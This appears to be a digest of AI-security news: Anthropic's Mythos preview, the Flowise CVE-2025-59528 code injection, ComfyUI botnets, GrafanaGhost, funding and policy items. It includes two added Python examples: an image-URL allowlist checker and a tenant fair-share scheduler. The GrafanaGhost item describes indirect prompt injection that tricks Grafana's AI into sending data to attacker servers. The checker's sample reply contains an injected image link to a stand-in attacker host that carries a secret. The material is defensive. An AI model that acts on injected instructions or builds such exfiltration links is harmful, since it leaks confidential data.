New tools, products, platforms, funding rounds, and company developments in AI security.
Anthropic is launching a new AI model called Claude Mythos Preview as part of Project Glasswing, a cybersecurity partnership with major tech companies like Nvidia, Google, and Microsoft. The model is designed to help large organizations and governments automatically detect vulnerabilities (security weaknesses) in their systems with minimal human involvement. Anthropic is limiting access to launch partners only and not releasing it publicly due to security concerns.
Hackers are actively exploiting CVE-2025-59528, a critical vulnerability in Flowise (an open-source platform for building AI agents and custom LLM applications) that allows arbitrary JavaScript code injection without validation through the CustomMCP node. The flaw was publicly disclosed in September, affects thousands of exposed instances online, and enables attackers to execute commands and access files on vulnerable systems.
At RSAC 2026, cybersecurity leaders discussed how AI should be used in security work, including debates about agentic applications (AI systems that can act independently to solve problems) and whether human involvement can realistically keep up as AI scales up. The discussions highlighted the tension between automating security tasks with AI and maintaining human oversight in important decisions.
AI agents (autonomous systems that learn and adapt to execute workflows without constant human direction) work best when organizations redesign their processes around them rather than adding them to existing systems. Companies need to shift to an 'agent-first' model where AI agents handle routine operations while humans set goals and handle exceptions, requiring machine-readable process definitions and structured data flows to succeed.
Attackers are targeting over 1,000 publicly accessible ComfyUI instances (a platform for running AI image generation) with an automated scanner that exploits a misconfiguration allowing unauthenticated remote code execution (the ability to run commands on a system without permission). Once compromised, these systems are enrolled in botnets (networks of infected computers controlled remotely) to mine cryptocurrency and serve as proxies.
Broadcom, a chip designer, announced new deals to produce AI chips for Google and expanded its partnership with Anthropic (an AI company), causing its stock price to rise 3.7% in premarket trading. The deals include revenue commitments and access to computing capacity, which analysts believe signal strong future demand for custom AI chips and may ease investor concerns about competition.
Modern cybersecurity is shifting from a reactive model (detecting and responding to attacks after they happen) to a proactive model that aims to disrupt attackers before they strike, because attack timelines have collapsed dramatically. Cyber attacks now unfold in seconds rather than hours, with artificial intelligence automating key attack phases, making traditional defense inadequate. In response, both the U.S. government and major tech companies are investing in legal and technical capabilities like litigation, takedowns, and public exposure of tools to impose cost and friction on threat actors across the entire attack ecosystem.
Flowise, an open-source AI platform, has a maximum-severity vulnerability (CVE-2025-59528, CVSS score 10.0) in its CustomMCP node that allows attackers to execute arbitrary JavaScript code on the server without validation, potentially leading to full system compromise and data theft. The flaw requires only an API token to exploit and is being actively exploited in the wild against over 12,000 exposed Flowise instances.
Broadcom has agreed to produce AI chips for Google and signed an expanded deal with Anthropic, giving the AI startup access to about 3.5 gigawatts of computing capacity (the amount of processing power available at one time) using Google's custom processors called TPUs (tensor processing units, which are specialized chips designed to run AI models). This reflects growing demand for the computing infrastructure needed to run generative AI (AI systems that create new text, images, or other content) at scale.
Anthropic released a preview of Mythos, a powerful new AI model, as part of Project Glasswing, a cybersecurity initiative involving over 40 partner organizations like Amazon, Microsoft, and Apple. The model, which was not specifically trained for cybersecurity but has strong coding and reasoning abilities, has reportedly identified thousands of zero-day vulnerabilities (security flaws unknown to the public and software vendors) in software systems during initial testing. The preview is limited to partner organizations for defensive security work and will not be made generally available to the public.
AI is making software creation faster and easier, leading to a future where temporary applications (instant software) might be created and deleted on demand, but this also means AI tools are getting better at both finding and exploiting vulnerabilities (weaknesses in code that attackers can use). While defenders can use the same AI capabilities to patch vulnerabilities and fix security problems, today's AI-generated software tends to contain many security flaws because AI doesn't yet write secure code well.
Fix (Flowise, CVE-2025-59528): Upgrade to Flowise version 3.1.1 or at least version 3.0.6 as soon as possible. Additionally, consider removing Flowise instances from the public internet if external access is not required.
Source: BleepingComputer

Nation-states are using AI agents (autonomous AI systems that can perform tasks without human intervention) to launch cyberattacks at speeds that traditional security responses cannot match. The article argues that cybersecurity defenses cannot rely on small, gradual improvements but must instead undergo fundamental architectural changes to address this new threat level.
Trent AI, a new startup, has secured $13 million in funding to develop a layered security solution (a multi-level protective system) designed to protect AI agents (software programs that act autonomously to complete tasks) throughout their entire lifecycle, from creation to deployment.
Many enterprises have applications disconnected from centralized identity systems (systems that control who can access what), creating blind spots that AI agents and attackers are actively exploiting. While organizations have invested in IAM (identity and access management, the practice of controlling user access) and Zero Trust security, legacy apps and siloed systems remain outside of centralized control, allowing AI agents to amplify credential risks and bypass security oversight.
GrafanaGhost is a critical vulnerability in Grafana (a data visualization platform) that uses indirect prompt injection (tricking an AI by hiding malicious instructions in data it processes) to steal sensitive enterprise data without requiring user authentication or interaction. Attackers chain together multiple exploits, including bypassing URL validation and AI safety guardrails, to trick Grafana's AI into sending confidential information to attacker-controlled servers.
Fix: Grafana has rolled out a fix for this issue. Additionally, security experts recommend: identifying exposure by checking whether Grafana AI/LLM features are enabled, patching to the latest version, restricting "img-src" (image source permissions) to known domains, and applying egress controls (network rules that limit outbound data traffic).
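The "restrict img-src to known domains" recommendation above comes down to one check: every image reference the AI feature emits must resolve to a host the operator trusts, so an injected reference cannot carry data to an attacker-controlled server. The following is an added illustration, not Grafana's code or configuration: it implements that allowlist check over assistant output, rejecting non-https schemes, userinfo confusion (`https://trusted@other/`) and lookalike hosts, and then scans a constructed reply for image references that fail it. The allowlist and the sample reply are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist of image hosts this deployment trusts (assumption, not a Grafana default).
ALLOWED_IMAGE_HOSTS = {"grafana.example.com", "assets.example.com"}

# Markdown images ![alt](url) and raw <img src="..."> tags.
_MD_IMG = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)")
_HTML_IMG = re.compile(r"<img[^>]*\ssrc=[\"']([^\"']+)[\"']", re.IGNORECASE)


def image_url_allowed(url: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> bool:
    """True only if url is https and its host is an allowed host or a subdomain of one.

    Anything else is refused: other schemes, URLs with userinfo (a classic way to make
    'https://grafana.example.com@other.invalid/' look trusted), empty hosts, and hosts
    that merely contain an allowed name as a prefix.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == h or host.endswith("." + h) for h in allowed_hosts)


def find_disallowed_images(text: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> list:
    """Return every image URL in assistant output that fails the allowlist, in order."""
    urls = _MD_IMG.findall(text) + _HTML_IMG.findall(text)
    return [u for u in urls if not image_url_allowed(u, allowed_hosts)]


# Constructed assistant reply: two legitimate images and one injected reference whose
# query string would carry data out if the client were allowed to fetch it.
SAMPLE_REPLY = """Here is the dashboard summary.
![logo](https://grafana.example.com/public/img/logo.png)
![x](https://collector.attacker.invalid/pixel.png?d=SECRET_PLACEHOLDER)
<img src="https://cdn.assets.example.com/chart.png">
"""

if __name__ == "__main__":
    for bad in find_disallowed_images(SAMPLE_REPLY):
        print("blocked image reference:", bad)
```

The same host test can be enforced at the browser via a Content-Security-Policy `img-src` directive listing the allowed hosts; doing it server-side as well means the reply is sanitized before it ever reaches a client that might not honour the policy. Egress controls at the network layer are the third, independent layer, so a reference that slips past both still has nowhere to connect.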
Source: CSO Online

OpenAI has published policy proposals suggesting that companies should trial four-day work weeks as AI tools become more capable and potentially displace workers from jobs. The company argues that AI systems will soon complete projects in days that currently take months, and recommends employers offer benefits like reduced work hours without pay cuts, increased retirement contributions, and subsidized childcare to help workers adapt to this shift.
Google has redesigned Gemini's crisis response feature to make it faster for users in distress to access mental health resources. When the chatbot detects a conversation indicating potential suicide or self-harm risk, it now presents a streamlined 'Help is available' module that connects users to crisis resources like suicide hotlines or crisis text lines more quickly.
Fix: Google updated Gemini to streamline its crisis response into a 'one-touch' module. The system detects conversations indicating suicide or self-harm risk and launches the 'Help is available' module to direct users to mental health crisis resources.
Source: The Verge (AI)

Multi-tenant SIEM (security information and event management, a platform that collects and analyzes security data from many sources) solutions share physical resources like CPU and memory among different customers, creating a "noisy neighbor" problem where one customer's heavy workload can slow down threat detection for others and violate service promises. While vendors market cloud-based SIEM as efficient and reliable, most don't publicly discuss how they prevent this fairness issue, which requires sophisticated engineering strategies like fair-share scheduling (giving each customer a proportional share of resources) and intelligent queuing rather than simple rate-limiting.
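To make the fair-share point concrete, here is an added simulation (not code from the article or from any SIEM vendor) of a deficit round-robin scheduler over per-tenant ingest queues. Each tenant earns `quantum * weight` credit per round and drains events while it has credit, so a tenant flooding the pipeline cannot push a quiet tenant's events to the back of a single shared queue. The tenant names, event costs and queue sizes are constructed; the comparison against plain FIFO ordering shows the latency the quiet tenant sees under each policy.

```python
from collections import deque
from dataclasses import dataclass, field


@dataclass
class Event:
    tenant: str
    cost: int  # processing units (e.g. KB to parse and index); constructed values


@dataclass
class TenantQueue:
    weight: int = 1          # relative share; 2 means twice the credit of a weight-1 tenant
    pending: deque = field(default_factory=deque)
    deficit: int = 0         # unspent credit carried into the next round


class FairShareScheduler:
    """Deficit round robin across tenants.

    Every round, each backlogged tenant receives quantum*weight credit and processes
    events from the head of its own queue while the head event fits in the credit.
    Credit that is too small for a large event carries over, so big events still get
    served; idle tenants do not bank credit, so they cannot later burst past others.
    """

    def __init__(self, quantum: int = 10):
        self.quantum = quantum
        self.tenants: dict = {}

    def set_weight(self, tenant: str, weight: int) -> None:
        self.tenants.setdefault(tenant, TenantQueue()).weight = weight

    def enqueue(self, ev: Event) -> None:
        self.tenants.setdefault(ev.tenant, TenantQueue()).pending.append(ev)

    def run(self) -> dict:
        """Drain all queues; return, per tenant, the cumulative units processed when
        that tenant's last event finished (its completion time)."""
        clock = 0
        finished = {}
        while any(q.pending for q in self.tenants.values()):
            for name, q in self.tenants.items():
                if not q.pending:
                    q.deficit = 0
                    continue
                q.deficit += self.quantum * q.weight
                while q.pending and q.pending[0].cost <= q.deficit:
                    ev = q.pending.popleft()
                    q.deficit -= ev.cost
                    clock += ev.cost
                    finished[name] = clock
        return finished


def fifo_completion(events) -> dict:
    """Single shared queue in arrival order: the baseline that produces noisy neighbors."""
    clock = 0
    finished = {}
    for ev in events:
        clock += ev.cost
        finished[ev.tenant] = clock
    return finished


def simulate():
    # Constructed load: a noisy tenant floods 200 events before a quiet tenant sends 4.
    events = [Event("noisy", 5) for _ in range(200)] + [Event("quiet", 5) for _ in range(4)]
    fifo = fifo_completion(events)
    sched = FairShareScheduler(quantum=10)
    for ev in events:
        sched.enqueue(ev)
    fair = sched.run()
    return fifo, fair


if __name__ == "__main__":
    fifo, fair = simulate()
    print("FIFO completion times:", fifo)        # quiet tenant waits behind the whole flood
    print("fair-share completion times:", fair)  # quiet tenant finishes within a few rounds
```

Simple rate-limiting would cap the noisy tenant even when the pipeline is otherwise idle, wasting capacity; the scheduler instead lets any tenant use spare capacity while guaranteeing each backlogged tenant its share, which is the property the article says vendors rarely explain.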
Fix (Flowise): The vulnerability was addressed in version 3.0.6 of the npm package. Users should upgrade to this version or later.
Source: The Hacker News

As AI models become more powerful, they create both greater risks and opportunities for security. CrowdStrike argues that while companies like Anthropic build safer models, organizations also need deployment governance (security controls for how and where AI runs in a company) to protect data and systems when AI agents access databases, workflows, and sensitive information. CrowdStrike offers tools for discovering all AI applications in use, monitoring what data they access, and preventing sensitive information from being exposed through AI workflows.
OpenAI has asked California and Delaware attorneys general to investigate what it calls 'anti-competitive behavior' by Elon Musk, claiming he is working to undermine the company through attacks and coordination with other rivals ahead of an April trial. OpenAI alleges that Musk has conducted opposition research on CEO Sam Altman, spread false allegations, and is using legal efforts to benefit his competing AI company xAI, which faces its own investigations for generating non-consensual explicit deepfake content.